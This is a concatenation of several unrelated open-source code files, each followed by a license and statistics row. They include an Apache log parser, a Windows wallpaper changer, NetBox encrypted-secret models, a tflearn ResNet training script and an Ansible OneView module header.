raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasInputHdrField(self,fieldName):
return fieldName in self.inputHdrFields
def getOutputHdrField(self, fieldName, matchObj):
groupId = self.outputHdrFields.get(fieldName)
if fieldName is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasOutputHdrField(self,fieldName):
return fieldName in self.outputHdrFields
def getEnvHdrField(self, fieldName, matchObj):
groupId = self.envHdrFields.get(fieldName)
if fieldName is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasEnvHdrField(self,fieldName):
return fieldName in self.envHdrFields
def getCookieHdrField(self, fieldName, matchObj):
groupId = self.cookieHdrFields.get(fieldName)
if fieldName is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasCookieHdrField(self,fieldName):
return fieldName in self.cookieHdrFields
class ApacheLogRecord(NCSALogRecord):
def __init__(self, format, line, match=None):
NCSALogRecord.__init__(self, format, line, match)
def inputHdrField(self, fieldName):
return self._format.getInputHdrField(fieldName, self._match)
def outputHdrField(self, fieldName):
return self._format.getOutputHdrField(fieldName, self._match)
def envHdrField(self, fieldName):
return self._format.getEnvHdrField(fieldName, self._match)
def cookieHdrField(self, fieldName):
return self._format.getCookieHdrField(fieldName, self._match)
@property
def remoteIp(self):
return self._format.getField(ApacheLogFormat.FLD_REMOTE_IP, self._match)
@property
def localIp(self):
return self._format.getField(ApacheLogFormat.FLD_LOCAL_IP, self._match)
@property
def durationUsecAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_DURATION_USEC, self._match)
@property
def durationUsec(self):
val = self.durationUsecAsStr
return 0 if val=="-" else int(val)
@property
def durationSecAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_DURATION_SEC, self._match)
@property
def durationSec(self):
val = self.durationSecAsStr
return 0 if val=="-" else int(val)
@property
def duration(self):
if self._format.hasField(ApacheLogFormat.FLD_DURATION_USEC):
return self.durationUsec/1000000.
return float(self.durationSec)
@property
def filename(self):
return self._format.getField(ApacheLogFormat.FLD_FILENAME, self._match)
@property
def keepaliveNumAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_KEEPALIVE_NUM, self._match)
@property
def keepaliveNum(self):
val = self.keepaliveNumAsStr
return 0 if val=="-" else int(val)
@property
def portAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_PORT, self._match)
@property
def port(self):
val = self.portAsStr
return 0 if val=="-" else int(val)
@property
def workerPidAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_WORKER_PID, self._match)
@property
def workerPid(self):
val = self.workerPidAsStr
return 0 if val=="-" else int(val)
@property
def handler(self):
return self._format.getField(ApacheLogFormat.FLD_HANDLER, self._match)
@property
def definedServerName(self):
return self._format.getField(ApacheLogFormat.FLD_DEFINED_SERVER_NAME, self._match)
@property
def serverName(self):
return self._format.getField(ApacheLogFormat.FLD_SERVER_NAME, self._match)
@property
def connectionStatus(self):
return self._format.getField(ApacheLogFormat.FLD_CONNECTION_STATUS, self._match)
@property
def receivedBytesAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_RECEIVED_BYTES, self._match)
@property
def receivedBytes(self):
val = self.receivedBytesAsStr
return 0 if val=="-" else int(val)
@property
def sentBytesAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_SENT_BYTES, self._match)
@property
def sentBytes(self):
val = self.sentBytesAsStr
return 0 if val=="-" else int(val)
@property
def userAgent(self):
return self._format.getField(ApacheLogFormat.FLD_USER_AGENT, self._match)
@property
def referer(self):
return self._format.getField(ApacheLogFormat.FLD_REFERER, self._match)
@property
def contentType(self):
return self._format.getField(ApacheLogFormat.FLD_CONTENT_TYPE, self._match)
@property
def contentLengthAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_CONTENT_LENGTH, self._match)
@property
def contentLength(self):
val = self.contentLengthAsStr
return -1 if val=="-" else int(val)
def getTestApacheRecord():
alf = ApacheLogFormat(formatStr = "extended")
line = '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 "http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"'
return ApacheLogRecord(alf, line)
def getTestCustomApacheRecord():
alf = ApacheLogFormat(formatStr = "%t %Dusec %h \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\" \"%{Content-type}o\" %{Content-length}o")
line = '[30/Oct/2014:23:28:19 +0200] 134usec 127.0.0.1 "GET http://www.host.com/path?query HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" "text/html; charset=ISO-8859-4" 1000'
return ApacheLogRecord(alf, line)
def test():
import m.ut_utils as ut
ut.START_TEST("apache_log_basic")
record = getTestApacheRecord()
ut.EXPECT_EQ("", "record.queryString")
ut.EXPECT_EQ("http://www.example.com/start.html", "record.referer")
ut.EXPECT_EQ("Mozilla/4.08 [en] (Win98; I ;Nav)", "record.userAgent")
ut.EXPECT_EQ("http://www.example.com/start.html", "record.inputHdrField('Referer')")
ut.EXPECT_EQ("Mozilla/4.08 [en] (Win98; I ;Nav)", "record.inputHdrField('User-agent')")
ut.EXPECT_EQ("127.0.0.1", "record.remoteHost")
ut.END_TEST()
ut.START_TEST("apache_log_custom")
record = getTestCustomApacheRecord()
ut.EXPECT_EQ("?query", "record.queryString")
ut.EXPECT_EQ("/path", "record.urlPath")
ut.EXPECT_EQ("http://www.host.com", "record.urlRoot")
ut.EXPECT_EQ("-", "record.referer")
ut.EXPECT_EQ(134e-6, "record.duration")
ut.EXPECT_EQ("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0", "record.userAgent")
ut.EXPECT_EQ("text/html; charset=ISO-8859-4", "record.contentType")
ut.EXPECT_EQ(1000, "record.contentLength")
ut.END_TEST() | bsd-3-clause | -8,697,373,372,509,737,000 | 38.335312 | 229 | 0.608751 | false |
globalpolicy/pyWall | main.py | 1 | 6745 | # Author : globalpolicy
# Date : March 2-4, 2017
# Script : pyWall
# Description : Change windows wallpaper
# Python : 3.5
# Blog : c0dew0rth.blogspot.com
import requests
from bs4 import BeautifulSoup
import random
import shutil # for copying raw image data(a file-like object) to an actual image file
import ctypes # for calling Win32 API, specifically, SystemParametersInfo, to set wallpaper
import base64 # for turning original imagename into filesystem safe name
import tempfile # for obtaining temp directory
import os # for deleting file
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel, QTextEdit, QCheckBox, \
QSystemTrayIcon # for GUI
from PyQt5.QtGui import QFont, QIcon
import sys # for sys.exit(app.exec_())
import threading # for multithreading obviously
import time # for timing utilities
class QTGui(QWidget):
def __init__(self):
super().__init__()
self.showWindow()
def changeEvent(self, QEvent):
if QEvent.type() == QEvent.WindowStateChange:
if self.isMinimized():
print("minimized")
self.minimizetotray()
super().changeEvent(QEvent)
def showWindow(self):
self.setGeometry(300, 300, 300, 63)
self.setFixedSize(self.size())
self.setWindowIcon(QIcon("icon.png"))
self.setWindowTitle("pyWall UI")
global btn
btn = QPushButton("Change", self)
btn.resize(75, 23)
btn.move(0, self.height() - btn.height())
btn.setToolTip("Change the wallpaper right now.")
btn.clicked.connect(newWallpaperInNewThread)
global txtinterval
txtinterval = QTextEdit("100", self)
txtinterval.setToolTip("Time interval in seconds between wallpaper changes.")
txtinterval.resize(70, 23)
txtinterval.move(0, btn.y() - txtinterval.height())
global chkbox
chkbox = QCheckBox("Timer", self)
chkbox.setToolTip("Use timer for auto wallpaper change.")
chkbox.resize(49, 17)
chkbox.move(0, txtinterval.y() - chkbox.height())
chkbox.stateChanged.connect(checkBoxStateChanged)
global label
label = QLabel("", self)
label.setFont(QFont("Times", 8, QFont.Bold))
label.move(btn.width() + 5, 0)
label.resize(self.width()-btn.width(),self.height())
label.setWordWrap(True)
self.show()
def minimizetotray(self):
self.hide()
self.tray = QSystemTrayIcon()
self.tray.setIcon(QIcon("icon.png"))
self.tray.setToolTip("pyWall Tray")
self.tray.show()
self.tray.showMessage("pyWall", "pyWall will run in background.", msecs=500)
self.tray.activated.connect(self.trayiconactivated)
def trayiconactivated(self, reason):
if reason == QSystemTrayIcon.Trigger:
self.tray.hide()
self.show()
def checkBoxStateChanged(self):
timerStatus = chkbox.checkState() # chkbox.checkState() returns the "after-changed" status
try:
timerInterval = float(txtinterval.toPlainText())
except ValueError:
timerInterval = 300 # fail-safe value
if timerStatus: # True if checked
global killThreadEvent
killThreadEvent = threading.Event()
threading.Thread(target=newWallpaperLoop, args=(timerInterval, killThreadEvent), daemon=True).start()
else:
killThreadEvent.set() # setting this event will request the thread to stop
def main():
app = QApplication(sys.argv)
ui = QTGui() # instantiate our GUI class wherein the form actually displays
sys.exit(app.exec_()) # wait while GUI not closed
def newWallpaperInNewThread():
threading.Thread(target=newWallpaper, daemon=True).start()
def newWallpaper():
global savepath # globalise for memory, for deleting the image next time this method executes
try:
os.remove(savepath) # delete the last downloaded image, the wallpaper will not be affected
print("Deleted ",savepath)
except Exception as ex:
print("Exception occurred while doing os.remove()\nException : ", ex)
try:
firstURL = "https://500px.com/popular"
firstResponse = requests.get(firstURL)
cookie = firstResponse.cookies["_hpx1"]
content = firstResponse.content
soup = BeautifulSoup(content, "lxml")
found = soup.find("meta", attrs={"name": "csrf-token"})
csrfToken = found["content"]
randomPage = random.randint(1, 1000)
apiURL = "https://api.500px.com/v1/photos"
secondResponse = requests.get(apiURL, params={"rpp": 50, "feature": "popular", "image_size": 1080, "sort": "rating",
"exclude": "Nude", "formats": "jpeg", "page": randomPage},
headers={"Cookie": "_hpx1=" + cookie, "X-CSRF-Token": csrfToken})
# 500px API Reference:
# https://github.com/500px/api-documentation/blob/master/endpoints/photo/GET_photos.md
jsonResponse = secondResponse.json()
randomIndex = random.randint(0, 49)
randomImageLink = jsonResponse["photos"][randomIndex]["images"][0]["url"]
randomImageName = jsonResponse["photos"][randomIndex]["name"]
print(randomImageLink)
print(randomImageName)
label.setText(randomImageName)
randomImageName = base64.urlsafe_b64encode(randomImageName.encode("UTF-8")).decode(
"UTF-8") # base64 encoding turns any imagename into a filesystem friendly name
download = requests.get(randomImageLink, stream=True) # stream=True is required to access download.raw data
except Exception as ex:
print("Something went wrong while downloading, no internet?\nException : ",ex)
return
try:
savepath = tempfile.gettempdir() + "\\" + randomImageName + ".jpg"
with open(savepath, "wb") as file:
shutil.copyfileobj(download.raw, file)
SPI_SETDESKWALLPAPER = 20
ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, savepath,
0) # ANSI version of the API doesn't seem to work here, thus the W
except Exception as ex:
print("Something went wrong while saving image.\nException : ", ex)
return
def newWallpaperLoop(timerinterval, stop_event):
while not stop_event.is_set():
newWallpaperInNewThread()
print("Spawning now!")
time.sleep(timerinterval)
print("stopped")
main()
| mit | -8,944,200,180,740,626,000 | 37.215116 | 124 | 0.630689 | false |
teamfx/openjfx-8u-dev-rt | modules/web/src/main/native/Source/JavaScriptCore/inspector/scripts/codegen/generate_cpp_alternate_backend_dispatcher_header.py | 1 | 4331 | #!/usr/bin/env python
#
# Copyright (c) 2014, 2016 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import logging
import string
import re
from string import Template
from cpp_generator import CppGenerator
from cpp_generator_templates import CppGeneratorTemplates as CppTemplates
log = logging.getLogger('global')
class CppAlternateBackendDispatcherHeaderGenerator(CppGenerator):
def __init__(self, *args, **kwargs):
CppGenerator.__init__(self, *args, **kwargs)
def output_filename(self):
return '%sAlternateBackendDispatchers.h' % self.protocol_name()
def generate_output(self):
template_args = {
'includes': self._generate_secondary_header_includes()
}
domains = self.domains_to_generate()
sections = []
sections.append(self.generate_license())
sections.append(Template(CppTemplates.AlternateDispatchersHeaderPrelude).substitute(None, **template_args))
sections.append('\n'.join(filter(None, map(self._generate_handler_declarations_for_domain, domains))))
sections.append(Template(CppTemplates.AlternateDispatchersHeaderPostlude).substitute(None, **template_args))
return '\n\n'.join(sections)
# Private methods.
def _generate_secondary_header_includes(self):
target_framework_name = self.model().framework.name
header_includes = [
([target_framework_name], (target_framework_name, "%sProtocolTypes.h" % self.protocol_name())),
(["JavaScriptCore"], ("JavaScriptCore", "inspector/InspectorFrontendRouter.h")),
(["JavaScriptCore"], ("JavaScriptCore", "inspector/InspectorBackendDispatcher.h")),
]
return '\n'.join(self.generate_includes_from_entries(header_includes))
def _generate_handler_declarations_for_domain(self, domain):
commands = self.commands_for_domain(domain)
if not len(commands):
return ''
command_declarations = []
for command in commands:
command_declarations.append(self._generate_handler_declaration_for_command(command))
handler_args = {
'domainName': domain.domain_name,
'commandDeclarations': '\n'.join(command_declarations),
}
return self.wrap_with_guard_for_domain(domain, Template(CppTemplates.AlternateBackendDispatcherHeaderDomainHandlerInterfaceDeclaration).substitute(None, **handler_args))
def _generate_handler_declaration_for_command(self, command):
lines = []
parameters = ['long callId']
for _parameter in command.call_parameters:
parameters.append('%s in_%s' % (CppGenerator.cpp_type_for_unchecked_formal_in_parameter(_parameter), _parameter.parameter_name))
command_args = {
'commandName': command.command_name,
'parameters': ', '.join(parameters),
}
lines.append(' virtual void %(commandName)s(%(parameters)s) = 0;' % command_args)
return '\n'.join(lines)
| gpl-2.0 | -8,505,268,923,321,353,000 | 42.747475 | 177 | 0.704918 | false |
digitalocean/netbox | netbox/secrets/models.py | 1 | 14739 | import os
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Util import strxor
from django.conf import settings
from django.contrib.auth.hashers import make_password, check_password
from django.contrib.auth.models import Group, User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_bytes
from taggit.managers import TaggableManager
from extras.models import ChangeLoggedModel, CustomFieldModel, TaggedItem
from extras.utils import extras_features
from utilities.querysets import RestrictedQuerySet
from .exceptions import InvalidKey
from .hashers import SecretValidationHasher
from .querysets import UserKeyQuerySet
from .utils import encrypt_master_key, decrypt_master_key, generate_random_key
__all__ = (
'Secret',
'SecretRole',
'SessionKey',
'UserKey',
)
class UserKey(models.Model):
"""
A UserKey stores a user's personal RSA (public) encryption key, which is used to generate their unique encrypted
copy of the master encryption key. The encrypted instance of the master key can be decrypted only with the user's
matching (private) decryption key.
"""
created = models.DateField(
auto_now_add=True
)
last_updated = models.DateTimeField(
auto_now=True
)
user = models.OneToOneField(
to=User,
on_delete=models.CASCADE,
related_name='user_key',
editable=False
)
public_key = models.TextField(
verbose_name='RSA public key'
)
master_key_cipher = models.BinaryField(
max_length=512,
blank=True,
null=True,
editable=False
)
objects = UserKeyQuerySet.as_manager()
class Meta:
ordering = ['user__username']
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Store the initial public_key and master_key_cipher to check for changes on save().
self.__initial_public_key = self.public_key
self.__initial_master_key_cipher = self.master_key_cipher
def __str__(self):
return self.user.username
def clean(self):
super().clean()
if self.public_key:
# Validate the public key format
try:
pubkey = RSA.import_key(self.public_key)
except ValueError:
raise ValidationError({
'public_key': "Invalid RSA key format."
})
except Exception:
raise ValidationError("Something went wrong while trying to save your key. Please ensure that you're "
"uploading a valid RSA public key in PEM format (no SSH/PGP).")
# Validate the public key length
pubkey_length = pubkey.size_in_bits()
if pubkey_length < settings.SECRETS_MIN_PUBKEY_SIZE:
raise ValidationError({
'public_key': "Insufficient key length. Keys must be at least {} bits long.".format(
settings.SECRETS_MIN_PUBKEY_SIZE
)
})
# We can't use keys bigger than our master_key_cipher field can hold
if pubkey_length > 4096:
raise ValidationError({
'public_key': "Public key size ({}) is too large. Maximum key size is 4096 bits.".format(
pubkey_length
)
})
def save(self, *args, **kwargs):
# Check whether public_key has been modified. If so, nullify the initial master_key_cipher.
if self.__initial_master_key_cipher and self.public_key != self.__initial_public_key:
self.master_key_cipher = None
# If no other active UserKeys exist, generate a new master key and use it to activate this UserKey.
if self.is_filled() and not self.is_active() and not UserKey.objects.active().count():
master_key = generate_random_key()
self.master_key_cipher = encrypt_master_key(master_key, self.public_key)
super().save(*args, **kwargs)
def delete(self, *args, **kwargs):
# If Secrets exist and this is the last active UserKey, prevent its deletion. Deleting the last UserKey will
# result in the master key being destroyed and rendering all Secrets inaccessible.
if Secret.objects.count() and [uk.pk for uk in UserKey.objects.active()] == [self.pk]:
raise Exception("Cannot delete the last active UserKey when Secrets exist! This would render all secrets "
"inaccessible.")
super().delete(*args, **kwargs)
def is_filled(self):
"""
Returns True if the UserKey has been filled with a public RSA key.
"""
return bool(self.public_key)
is_filled.boolean = True
def is_active(self):
"""
Returns True if the UserKey has been populated with an encrypted copy of the master key.
"""
return self.master_key_cipher is not None
is_active.boolean = True
def get_master_key(self, private_key):
"""
Given the User's private key, return the encrypted master key.
"""
if not self.is_active:
raise ValueError("Unable to retrieve master key: UserKey is inactive.")
try:
return decrypt_master_key(force_bytes(self.master_key_cipher), private_key)
except ValueError:
return None
def activate(self, master_key):
"""
Activate the UserKey by saving an encrypted copy of the master key to the database.
"""
if not self.public_key:
raise Exception("Cannot activate UserKey: Its public key must be filled first.")
self.master_key_cipher = encrypt_master_key(master_key, self.public_key)
self.save()
class SessionKey(models.Model):
"""
A SessionKey stores a User's temporary key to be used for the encryption and decryption of secrets.
"""
userkey = models.OneToOneField(
to='secrets.UserKey',
on_delete=models.CASCADE,
related_name='session_key',
editable=False
)
cipher = models.BinaryField(
max_length=512,
editable=False
)
hash = models.CharField(
max_length=128,
editable=False
)
created = models.DateTimeField(
auto_now_add=True
)
key = None
class Meta:
ordering = ['userkey__user__username']
def __str__(self):
return self.userkey.user.username
def save(self, master_key=None, *args, **kwargs):
if master_key is None:
raise Exception("The master key must be provided to save a session key.")
# Generate a random 256-bit session key if one is not already defined
if self.key is None:
self.key = generate_random_key()
# Generate SHA256 hash using Django's built-in password hashing mechanism
self.hash = make_password(self.key)
# Encrypt master key using the session key
self.cipher = strxor.strxor(self.key, master_key)
super().save(*args, **kwargs)
def get_master_key(self, session_key):
# Validate the provided session key
if not check_password(session_key, self.hash):
raise InvalidKey("Invalid session key")
# Decrypt master key using provided session key
master_key = strxor.strxor(session_key, bytes(self.cipher))
return master_key
def get_session_key(self, master_key):
# Recover session key using the master key
session_key = strxor.strxor(master_key, bytes(self.cipher))
# Validate the recovered session key
if not check_password(session_key, self.hash):
raise InvalidKey("Invalid master key")
return session_key
class SecretRole(ChangeLoggedModel):
"""
A SecretRole represents an arbitrary functional classification of Secrets. For example, a user might define roles
such as "Login Credentials" or "SNMP Communities."
"""
name = models.CharField(
max_length=100,
unique=True
)
slug = models.SlugField(
max_length=100,
unique=True
)
description = models.CharField(
max_length=200,
blank=True,
)
objects = RestrictedQuerySet.as_manager()
csv_headers = ['name', 'slug', 'description']
class Meta:
ordering = ['name']
def __str__(self):
return self.name
def get_absolute_url(self):
return "{}?role={}".format(reverse('secrets:secret_list'), self.slug)
def to_csv(self):
return (
self.name,
self.slug,
self.description,
)
@extras_features('custom_fields', 'custom_links', 'export_templates', 'webhooks')
class Secret(ChangeLoggedModel, CustomFieldModel):
"""
A Secret stores an AES256-encrypted copy of sensitive data, such as passwords or secret keys. An irreversible
SHA-256 hash is stored along with the ciphertext for validation upon decryption. Each Secret is assigned to exactly
one NetBox object, and objects may have multiple Secrets associated with them. A name can optionally be defined
along with the ciphertext; this string is stored as plain text in the database.
A Secret can be up to 65,535 bytes (64KB - 1B) in length. Each secret string will be padded with random data to
a minimum of 64 bytes during encryption in order to protect short strings from ciphertext analysis.
"""
assigned_object_type = models.ForeignKey(
to=ContentType,
on_delete=models.PROTECT
)
assigned_object_id = models.PositiveIntegerField()
assigned_object = GenericForeignKey(
ct_field='assigned_object_type',
fk_field='assigned_object_id'
)
role = models.ForeignKey(
to='secrets.SecretRole',
on_delete=models.PROTECT,
related_name='secrets'
)
name = models.CharField(
max_length=100,
blank=True
)
ciphertext = models.BinaryField(
max_length=65568, # 128-bit IV + 16-bit pad length + 65535B secret + 15B padding
editable=False
)
hash = models.CharField(
max_length=128,
editable=False
)
tags = TaggableManager(through=TaggedItem)
objects = RestrictedQuerySet.as_manager()
plaintext = None
csv_headers = ['assigned_object_type', 'assigned_object_id', 'role', 'name', 'plaintext']
class Meta:
ordering = ('role', 'name', 'pk')
unique_together = ('assigned_object_type', 'assigned_object_id', 'role', 'name')
def __init__(self, *args, **kwargs):
self.plaintext = kwargs.pop('plaintext', None)
super().__init__(*args, **kwargs)
def __str__(self):
return self.name or 'Secret'
def get_absolute_url(self):
return reverse('secrets:secret', args=[self.pk])
def to_csv(self):
return (
f'{self.assigned_object_type.app_label}.{self.assigned_object_type.model}',
self.assigned_object_id,
self.role,
self.name,
self.plaintext or '',
)
def _pad(self, s):
"""
Prepend the length of the plaintext (2B) and pad with garbage to a multiple of 16B (minimum of 64B).
+--+--------+-------------------------------------------+
|LL|MySecret|xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|
+--+--------+-------------------------------------------+
"""
s = s.encode('utf8')
if len(s) > 65535:
raise ValueError("Maximum plaintext size is 65535 bytes.")
# Minimum ciphertext size is 64 bytes to conceal the length of short secrets.
if len(s) <= 62:
pad_length = 62 - len(s)
elif (len(s) + 2) % 16:
pad_length = 16 - ((len(s) + 2) % 16)
else:
pad_length = 0
header = bytes([len(s) >> 8]) + bytes([len(s) % 256])
return header + s + os.urandom(pad_length)
def _unpad(self, s):
"""
Consume the first two bytes of s as a plaintext length indicator and return only that many bytes as the
plaintext.
"""
if isinstance(s[0], str):
plaintext_length = (ord(s[0]) << 8) + ord(s[1])
else:
plaintext_length = (s[0] << 8) + s[1]
return s[2:plaintext_length + 2].decode('utf8')
def encrypt(self, secret_key):
"""
Generate a random initialization vector (IV) for AES. Pad the plaintext to the AES block size (16 bytes) and
encrypt. Prepend the IV for use in decryption. Finally, record the SHA256 hash of the plaintext for validation
upon decryption.
"""
if self.plaintext is None:
raise Exception("Must unlock or set plaintext before locking.")
# Pad and encrypt plaintext
iv = os.urandom(16)
aes = AES.new(secret_key, AES.MODE_CFB, iv)
self.ciphertext = iv + aes.encrypt(self._pad(self.plaintext))
# Generate SHA256 using Django's built-in password hashing mechanism
self.hash = make_password(self.plaintext, hasher=SecretValidationHasher())
self.plaintext = None
def decrypt(self, secret_key):
"""
Consume the first 16 bytes of self.ciphertext as the AES initialization vector (IV). The remainder is decrypted
using the IV and the provided secret key. Padding is then removed to reveal the plaintext. Finally, validate the
decrypted plaintext value against the stored hash.
"""
if self.plaintext is not None:
return
if not self.ciphertext:
raise Exception("Must define ciphertext before unlocking.")
# Decrypt ciphertext and remove padding
iv = bytes(self.ciphertext[0:16])
ciphertext = bytes(self.ciphertext[16:])
aes = AES.new(secret_key, AES.MODE_CFB, iv)
plaintext = self._unpad(aes.decrypt(ciphertext))
# Verify decrypted plaintext against hash
if not self.validate(plaintext):
raise ValueError("Invalid key or ciphertext!")
self.plaintext = plaintext
def validate(self, plaintext):
"""
Validate that a given plaintext matches the stored hash.
"""
if not self.hash:
raise Exception("Hash has not been generated for this secret.")
return check_password(plaintext, self.hash, preferred=SecretValidationHasher())
| apache-2.0 | -4,090,337,497,129,936,000 | 33.68 | 120 | 0.619581 | false |
5nizza/party-elli | synthesis/model_k_searcher.py | 1 | 1140 | import logging
from helpers.logging_helper import log_entrance
from interfaces.LTS import LTS
from interfaces.solver_interface import SolverInterface
from synthesis.coreach_encoder import CoreachEncoder
from synthesis.smt_format import make_check_sat
@log_entrance()
def search(min_size:int, max_size:int,
max_k:int,
encoder:CoreachEncoder,
solver:SolverInterface) -> LTS or None:
solver += encoder.encode_headers()
solver += encoder.encode_initialization()
last_size = 0
for size in range(min_size, max_size+1):
k = min(max_k, size//3 + 1)
logging.info('searching a model: size=%i, k=%i'%(size,k))
solver += encoder.encode_run_graph(range(size)[last_size:])
solver.push() # >>>>>>>>> push
solver += encoder.encode_model_bound(range(size))
solver += make_check_sat(encoder.encode_assumption_forbid_k(max_k - k))
solver += encoder.encode_get_model_values()
ret = solver.solve()
if ret:
return encoder.parse_model(ret)
solver.pop() # <<<<<<<<<< pop
last_size = size
return None
| mit | 5,410,120,537,181,015,000 | 30.666667 | 79 | 0.635965 | false |
qdonnellan/django_emailoto | emailoto/config.py | 1 | 1065 | from django.conf import settings
class EmailOtoConfig(object):
def __init__(self):
"""Read from settings.py and apply defaults (or raise exceptions.)"""
self.redis_host = settings.EMAILOTO.get('redis_host', 'localhost')
self.redis_port = settings.EMAILOTO.get('redis_port', 6379)
self.redis_db = settings.EMAILOTO.get('redis_db', 2)
self.expiration = settings.EMAILOTO.get('expiration', 60 * 10)
self.ratelimit = settings.EMAILOTO.get('ratelimit', '5/m')
class ImproperlyConfigured(Exception):
pass
@property
def mailgun_api_key(self):
return self.get_or_raise('mailgun_api_key')
@property
def mailgun_api_url(self):
return self.get_or_raise('mailgun_api_url')
def get_or_raise(self, setting_key):
value = settings.EMAILOTO.get(setting_key)
if not value:
raise self.ImproperlyConfigured(
'No "%s" found in settings.py configuration.' % (setting_key)
)
return value
CONFIG = EmailOtoConfig()
| mit | -8,496,874,060,864,339,000 | 29.428571 | 77 | 0.630986 | false |
EPyutao/tfProject | Resnet.py | 1 | 1879 | from __future__ import division, print_function, absolute_import
import tflearn
# Residual blocks
# 32 layers: n=5, 56 layers: n=9, 110 layers: n=18
n = 5
# Data loading
from tflearn.datasets import cifar10
(X, Y), (testX, testY) = cifar10.load_data()
Y = tflearn.data_utils.to_categorical(Y, 10)
testY = tflearn.data_utils.to_categorical(testY, 10)
# Real-time data preprocessing
img_prep = tflearn.ImagePreprocessing()
img_prep.add_featurewise_zero_center(per_channel=True)
# Real-time data augmentation
img_aug = tflearn.ImageAugmentation()
img_aug.add_random_flip_leftright()
img_aug.add_random_crop([32, 32], padding=4)
# Building Residual Network
net = tflearn.input_data(shape=[None, 32, 32, 3],
data_preprocessing=img_prep,
data_augmentation=img_aug)
net = tflearn.conv_2d(net, 16, 3, regularizer='L2', weight_decay=0.0001)
net = tflearn.residual_block(net, n, 16)
net = tflearn.residual_block(net, 1, 32, downsample=True)
net = tflearn.residual_block(net, n-1, 32)
net = tflearn.residual_block(net, 1, 64, downsample=True)
net = tflearn.residual_block(net, n-1, 64)
net = tflearn.batch_normalization(net)
net = tflearn.activation(net, 'relu')
net = tflearn.global_avg_pool(net)
# Regression
net = tflearn.fully_connected(net, 10, activation='softmax')
mom = tflearn.Momentum(0.1, lr_decay=0.1, decay_step=32000, staircase=True)
net = tflearn.regression(net, optimizer=mom,
loss='categorical_crossentropy')
# Training
model = tflearn.DNN(net, checkpoint_path='model_resnet_cifar10',
max_checkpoints=10, tensorboard_verbose=0,
clip_gradients=0.)
model.fit(X, Y, n_epoch=200, validation_set=(testX, testY),
snapshot_epoch=False, snapshot_step=500,
show_metric=True, batch_size=128, shuffle=True,
run_id='resnet_cifar10')
| mit | -5,045,116,224,309,985,000 | 36.58 | 75 | 0.688664 | false |
HewlettPackard/oneview-ansible | library/oneview_enclosure_group_facts.py | 1 | 4175 | #!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2019) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: oneview_enclosure_group_facts
short_description: Retrieve facts about one or more of the OneView Enclosure Groups.
description:
- Retrieve facts about one or more of the Enclosure Groups from OneView.
version_added: "2.3"
requirements:
- "python >= 2.7.9"
- "hpeOneView >= 5.4.0"
author:
- "Gustavo Hennig (@GustavoHennig)"
- "Bruno Souza (@bsouza)"
options:
name:
description:
- Enclosure Group name.
required: false
options:
description:
- "List with options to gather additional facts about Enclosure Group.
Options allowed:
C(configuration_script) Gets the configuration script for an Enclosure Group."
required: false
extends_documentation_fragment:
- oneview
- oneview.factsparams
'''
EXAMPLES = '''
